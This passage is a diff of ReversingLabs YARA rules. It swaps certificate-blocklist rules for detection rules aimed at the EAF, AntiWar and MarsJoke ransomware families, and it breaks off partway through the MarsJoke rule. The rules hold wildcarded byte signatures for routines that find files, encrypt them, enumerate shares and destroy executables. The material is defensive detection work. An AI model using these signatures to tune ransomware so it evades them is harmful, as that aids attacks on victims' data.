+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.EAF.yara#L1-L89"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d47d59d7680000d6c35181be2d9b034c2ecb7ca754a39c8e11750ddd7246b47c"
+		logic_hash = "3d10c852f95e8aa9bcd3543b96650b98ac57bcd2aa2b374e0badb63b5a4c0396"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "EAF"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            00 03 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 39 ?? ?? ?? ?? 00 7E ??
+            ?? ?? ?? 0C 03 28 ?? ?? ?? ?? 0D 03 28 ?? ?? ?? ?? 13 ?? 1E 8D ?? ?? ?? ?? 25 16 11 ??
+            A2 25 17 72 ?? ?? ?? ?? A2 25 18 7E ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A 28 ??
+            ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 25 1C 09 A2 25 1D 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ??
+            13 ?? 02 03 11 ?? 08 28 ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            2B ?? 16 13 ?? 11 ?? 2C ?? 00 00 03 11 ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 00
+            00 00 DE ?? 26 00 00 DE ?? 2A
+        }
+		$encrypt_files_p2 = {
+            00 03 19 73 ?? ?? ?? ?? 0A 00 04 18 73 ?? ?? ?? ?? 0B 00 06 16 6A 6F ?? ?? ?? ?? 00 28
+            ?? ?? ?? ?? 0C 00 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 05 09 73 ??
+            ?? ?? ?? 13 ?? 00 08 17 6F ?? ?? ?? ?? 00 08 18 6F ?? ?? ?? ?? 00 08 11 ?? 1F ?? 6F ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 00 08 11 ?? 1F ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 08 6F ??
+            ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 00 20 ?? ?? ?? ?? 13 ?? 11 ?? 8D ?? ?? ?? ?? 13 ?? 16
+            13 ?? 00 06 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? FE 02 16 FE 01 13
+            ?? 11 ?? 2C ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 2B ?? 11 ?? 20 ?? ?? ?? ??
+            32 ?? 11 ?? 20 ?? ?? ?? ?? FE 02 16 FE 01 2B ?? 16 13 ?? 11 ?? 2C ?? 00 11 ?? 11 ?? 16
+            11 ?? 6F ?? ?? ?? ?? 00 00 2B ?? 11 ?? 20 ?? ?? ?? ?? 32 ?? 11 ?? 20 ?? ?? ?? ?? FE 02
+            16 FE 01 2B ?? 16 13 ?? 11 ?? 2C ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 2B ??
+            00 07 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 11 ?? 58 13 ?? 00 11 ?? 16 FE 03 13 ??
+            11 ?? 3A ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ??
+            00 DC 00 DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 00 DE ?? 08 2C ?? 08 6F ?? ?? ??
+            ?? 00 DC 07 6F ?? ?? ?? ?? 00 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 06 6F ?? ?? ??
+            ?? 00 00 DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? 00 DC 03 28 ?? ?? ?? ?? 00 17 13 ?? DE ?? 26
+            00 16 13 ?? DE ?? 11 ?? 2A
+        }
+		$find_files_p1 = {
+            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 16 0C 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0D 00 09 06 08 9A
+            28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 08 9A 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 09 FE 06 ??
+            ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 2C ?? 11 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 11 ?? 7E ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 2B ?? 16 13 ?? 11 ?? 2C ?? 00 7E ?? ?? ?? ?? 06 08 9A 6F ?? ?? ?? ?? 00 00 00 08 17
+            58 0C 08 06 8E 69 FE 04 13 ?? 11 ?? 3A ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 16
+            13 ?? 2B ?? 00 07 11 ?? 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 07 11 ?? 9A 72 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 2C ?? 07 11 ?? 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 07 11 ?? 9A 72
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 2B ?? 16 13 ?? 11 ?? 2C ?? 00 07 11 ?? 9A 28 ?? ?? ?? ?? 00
+            00 00 11 ?? 17 58 13 ?? 11 ?? 07 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 DE ?? 26 00 00 DE ??
+            2A
+        }
+		$find_files_p2 = {
+            00 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 73 ?? ?? ?? ?? 0C 08 06 07 9A 7D ?? ?? ?? ?? 00 08 7B
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 08 7B ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 2B ?? 16 0D 09 2C ?? 00 08 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 00 00 00 07 17 58 0B 07 06 8E 69 32 ?? 00 DE ?? 26 00 00 DE ?? 2A
+        }
+		$destroy_exe_file = {
+            00 1F ?? 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 0C 7E ??
+            ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 08 72 ?? ?? ?? ?? 1B 8D ??
+            ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 06 A2 25 18 72 ?? ?? ?? ?? A2 25 19 28 ?? ?? ??
+            ?? A2 25 1A 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 00
+            DE ?? 26 00 00 DE ?? 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ghada Saffarini" and pe.signatures [ i ] . serial == "04:92:f5:c1:8e:26:fa:0c:d7:e1:50:67:67:4a:ff:1c" and 1445990399 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $destroy_exe_file )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_6Aa668Cd6A9De1Fdd476Ea8225326937 : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Antiwar : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects AntiWar ransomware."
 		author = "ReversingLabs"
-		id = "bfff2210-8545-594d-8674-243e57e3dd09"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "3113ec26-e149-527b-9478-4dd86c7fa464"
+		date = "2022-04-21"
+		modified = "2022-04-21"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1780-L1796"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.AntiWar.yara#L1-L146"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "706e16995af40a6c9176dcbca07fb406f2efe4d47dbd9629d1a6b1ab1d09b045"
+		logic_hash = "2d885f35454aaf7cb33f03c30b6681aa16cbe8353003bbae0b1e9fdecb2ff8a7"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "AntiWar"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            49 8B D7 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ??
+            48 8D 95 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 4C 8B F0 48 89 44 24 ?? 48 83 F8 ??
+            0F 84 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 41 8B DC 48 8D 3D ?? ?? ?? ?? 66 90 48 8B 0F
+            E8 ?? ?? ?? ?? 48 8B D0 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
+            ?? FF C3 48 83 C7 ?? 83 FB ?? 72 ?? 49 8B D7 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 15 ??
+            ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ??
+            F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 66 0F 6F 35 ?? ?? 03 00 66 0F 6F 3D ?? ?? 03
+            00 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 C7 85 ?? ?? 00 00 ?? ?? 8B 05 ?? ?? ?? ?? 4C 8D
+            3C C5 ?? ?? ?? ?? 41 BC ?? ?? ?? ?? 65 48 8B 04 25 ?? ?? ?? ?? 4A 8B 0C 38 41 8B 04
+            0C 39 05 ?? ?? ?? ?? 7E ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ??
+            75 ?? C6 05 ?? ?? ?? ?? ?? 0F 11 35 ?? ?? ?? ?? 0F 11 3D ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 89 05 ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 66 89 05 ?? ?? 04 00 48 8D 0D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 74 ?? 45 33
+            C9 41 BA ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 4D 2B D6 49 BB ?? ?? ?? ?? ?? ?? ?? ?? 66
+            66 0F 1F 84 00 ?? ?? 00 00 4B 8D 14 31 41 0F B6 C9 80 E1 ?? C0 E1 ?? 49 8B C3 48 D3
+        }
+		$find_files_p2 = {
+            E8 30 02 4C 8D 42 ?? 41 8D 0C 12 80 E1 ?? C0 E1 ?? 49 8B D3 48 D3 EA 41 30 10 49 83
+            C1 ?? 49 83 F9 ?? 72 ?? 4C 8B 74 24 ?? C6 05 ?? ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 48 8B D0 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 E8 ?? 48 63 C8 78 ?? 0F 1F 40 ?? 66 83 BC
+            4D ?? ?? 00 00 ?? 74 ?? FF C8 48 83 E9 ?? 79 ?? EB ?? B3 ?? 48 98 4C 8D B5 ?? ?? ??
+            ?? 4D 8D 34 46 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? 45 33 ED 48 8B 0F E8 ?? ?? ?? ??
+            48 8B D0 49 8B CE FF 15 ?? ?? ?? ?? 0F B6 DB 85 C0 41 0F 44 DD 48 8D 7F ?? 48 83 EE
+            ?? 75 ?? 4C 8B 6C 24 ?? 4C 8B 74 24 ?? 84 DB 0F 84 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ??
+            45 33 C0 49 8B D5 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 FF
+            90 89 BD ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 33 D2 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 83 3D ?? ?? ?? ?? ??
+            0F 84 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 85 C9 0F 84 ?? ?? ?? ?? 83 79 ?? ?? 0F 8C
+            ?? ?? ?? ?? 66 0F 6F 35 ?? ?? 03 00 66 0F 6F 3D ?? ?? 03 00 66 C7 85 ?? ?? 00 00 ??
+            ?? 65 48 8B 04 25 ?? ?? ?? ?? 4A 8B 0C 38 41 8B 04 0C 39 05 ?? ?? ?? ?? 7E ?? 48 8D
+            0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? C6 05 ?? ?? ?? ?? ?? 0F 11
+            35 ?? ?? ?? ?? 0F 11 3D ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 66 89 05 ?? ?? 04 00 48 8D
+        }
+		$find_files_p3 = {
+            0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ??
+            ?? 74 ?? 48 8B C7 41 BA ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 4D 2B D6 49 BB ?? ?? ?? ??
+            ?? ?? ?? ?? 90 4E 8D 0C 30 0F B6 C8 80 E1 ?? C0 E1 ?? 4D 8B C3 49 D3 E8 45 30 01 43
+            8D 0C 11 80 E1 ?? C0 E1 ?? 49 8B D3 48 D3 EA 41 30 51 ?? 48 83 C0 ?? 48 83 F8 ?? 72
+            ?? 4C 8B 74 24 ?? C6 05 ?? ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? C7 44 24
+            ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 48 89 7D ?? 48 C7 45 ?? ?? ?? ?? ?? BA
+            ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ??
+            ?? ?? ?? 48 89 85 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? 66 89 BD ?? ?? 00 00 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ??
+            48 8D 4D ?? E8 ?? ?? ?? ?? 48 8B D6 48 85 DB 48 0F 45 D3 48 8D 4D ?? E8 ?? ?? ?? ??
+            48 8B 3D ?? ?? ?? ?? 48 8B 5F ?? 48 3B 5F ?? 74 ?? 0F 1F 84 00 ?? ?? ?? ?? 48 8B 0B
+        }
+		$find_files_p4 = {
+            48 8B 01 48 8D 54 24 ?? FF 50 ?? 48 83 C3 ?? 48 3B 5F ?? 75 ?? 48 8D 05 ?? ?? ?? ??
+            48 89 44 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 83 FA ??
+            72 ?? 48 FF C2 48 8B 8D ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ??
+            48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 FF
+            48 89 BD ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 40 88 BD ?? ?? ?? ?? 48 8D 4D
+            ?? E8 ?? ?? ?? ?? EB ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 4C 8D 85 ??
+            ?? ?? ?? 33 D2 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 85 ?? ?? ??
+            ?? 45 33 C0 49 8B D5 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45
+            33 E4 4C 8B 7C 24 ?? 48 8D 95 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 85 C0
+        }
+		$enum_shares = {
+            48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 44 24 ?? 33 D2 C7 44 24 ?? ?? ?? ??
+            ?? 48 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 4C 8B C9 48 89 44 24 ?? 8D 4A ?? 44 8D 42
+            ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? 48 89 7C 24 ?? E8 ?? ?? ?? ??
+            48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 4C 8B C0 48 8D 54
+            24 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 89 5C 24 ?? 33 DB 39 5C 24 ?? 76 ?? 0F 1F 84 00
+            ?? ?? ?? ?? 48 8D 0C 5B 48 C1 E1 ?? 48 03 CF F6 41 ?? ?? 74 ?? E8 ?? ?? ?? ?? EB ??
+            48 8B 49 ?? E8 ?? ?? ?? ?? FF C3 3B 5C 24 ?? 72 ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 4C
+            8B C7 48 8D 54 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 5C 24 ?? 48 8B CF E8 ?? ?? ??
+            ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 8B 4C 24 ?? 48 33 CC E8 ?? ?? ??
+            ?? 48 83 C4 ?? C3
+        }
+		$encrypt_files_p1 = {
+            48 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA
+            ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B F0 48 8B 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 49 83 FE ?? 0F 84 ?? ?? ?? ?? 41 BD ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 49
+            8B CE FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B F8 48 85 C0 0F 84 ?? ??
+            ?? ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 80
+            A5 ?? ?? ?? ?? ?? 0F B6 8D ?? ?? ?? ?? 80 E1 ?? 80 C9 ?? 88 8D ?? ?? ?? ?? 4C 8D 85
+            ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? ??
+            ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ??
+            BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 45 8B C1 48 8D
+            95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ??
+            ?? ?? ?? 33 D2 44 8D 42 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 44 8D 42 ?? 48
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 44 8D 42 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 8B DE 45 33 C9 45 33 C0 48 8B D6 49 8B CE FF 15 ?? ?? ?? ?? 48 8B 8D ?? ?? ??
+            ?? 48 81 F9 ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 F7 E9 48
+        }
+		$encrypt_files_p2 = {
+            8B FA 48 C1 FF ?? 48 8B C7 48 C1 E8 ?? 48 03 F8 48 85 FF 0F 8E ?? ?? ?? ?? 48 89 74
+            24 ?? 4C 8D 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 8B D7 49 8B CE FF 15 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 89 44 24 ?? 4D 8B CF 4D 8B C7 48 8D 95 ?? ?? ?? ?? 33 C9 E8 ?? ?? ??
+            ?? 45 33 C9 45 33 C0 48 8B D3 49 8B CE FF 15 ?? ?? ?? ?? 48 89 74 24 ?? 4C 8D 8D ??
+            ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 8B D7 49 8B CE FF 15 ?? ?? ?? ?? 48 81 C3 ?? ?? ?? ??
+            45 33 C9 45 33 C0 48 8B D3 49 8B CE FF 15 ?? ?? ?? ?? 48 83 EF ?? 0F 85 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 83 78 ?? ?? 0F 8C ??
+            ?? ?? ?? 41 8B C6 48 8D 1C C5 ?? ?? ?? ?? 65 48 8B 04 25 ?? ?? ?? ?? 48 8B 0C 18 8B
+            04 0F 39 05 ?? ?? ?? ?? 7E ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ??
+            ?? 75 ?? 66 C7 05 ?? ?? 05 00 ?? ?? C6 05 ?? ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 74 ?? 80 35 ?? ??
+            ?? ?? ?? 80 35 ?? ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 65 48 8B 04 25 ?? ?? ?? ?? 48 8B
+            0C 18 8B 04 0F 39 05 ?? ?? ?? ?? 7E ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ??
+            ?? ?? ?? ?? 75 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BSCP LIMITED" and pe.signatures [ i ] . serial == "6a:a6:68:cd:6a:9d:e1:fd:d4:76:ea:82:25:32:69:37" and 1441583999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $enum_shares ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_1Cb06Dccb482255728671Ea12Ac41620 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Marsjoke : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects MarsJoke ransomware."
 		author = "ReversingLabs"
-		id = "5a7f61a4-15ba-5f5c-89e1-b8b986e13f19"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "8164c586-f548-5414-9df8-61e0c51cbe29"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1798-L1814"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.MarsJoke.yara#L1-L157"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e0867ffe2ddd28282fe78b27b3b12ebac525b33a27dd242bc6f55bcd2e066a18"
+		logic_hash = "298b2fd99793a15b3537853289e1337648d3fa84f12038e6f6831741404b7c5c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "MarsJoke"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fangzhen Li" and pe.signatures [ i ] . serial == "1c:b0:6d:cc:b4:82:25:57:28:67:1e:a1:2a:c4:16:20" and 1445126399 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_370C2467C41D6019Bbecd72E00C5D73D : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "18c5d1bb-21b8-5157-a03b-8bcbdc74c0cd"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1816-L1832"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2b99522b75ee83d85b30146cb292b5a8a46dc300fb43dd9d39d9ca96c9d32d9b"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$search_and_encrypt_files = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 8B 45
+            ?? 53 56 89 44 24 ?? 8B 45 ?? 57 89 44 24 ?? 8B 45 ?? BE ?? ?? ?? ?? 33 DB 56 89 44
+            24 ?? 8D 84 24 ?? ?? ?? ?? 8B F9 53 50 89 7C 24 ?? 66 89 9C 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 56 8D 84 24 ?? ?? ?? ?? 53 50 66 89 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 8D 84 24 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 57 8D 4C 24 ?? 88 5C 24 ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ?? 38 5C 24 ?? 0F 85 ?? ?? ?? ?? 8D 84 24 ??
+            ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 59 59 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84
+            24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 59 59 BE ?? ?? ??
+            ?? 56 8D 84 24 ?? ?? ?? ?? 50 FF D7 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 FF
+            74 24 ?? FF D7 FF 74 24 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 84 C0 8D 84 24 ?? ?? ?? ?? 75 ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? E9 ?? ?? ?? ??
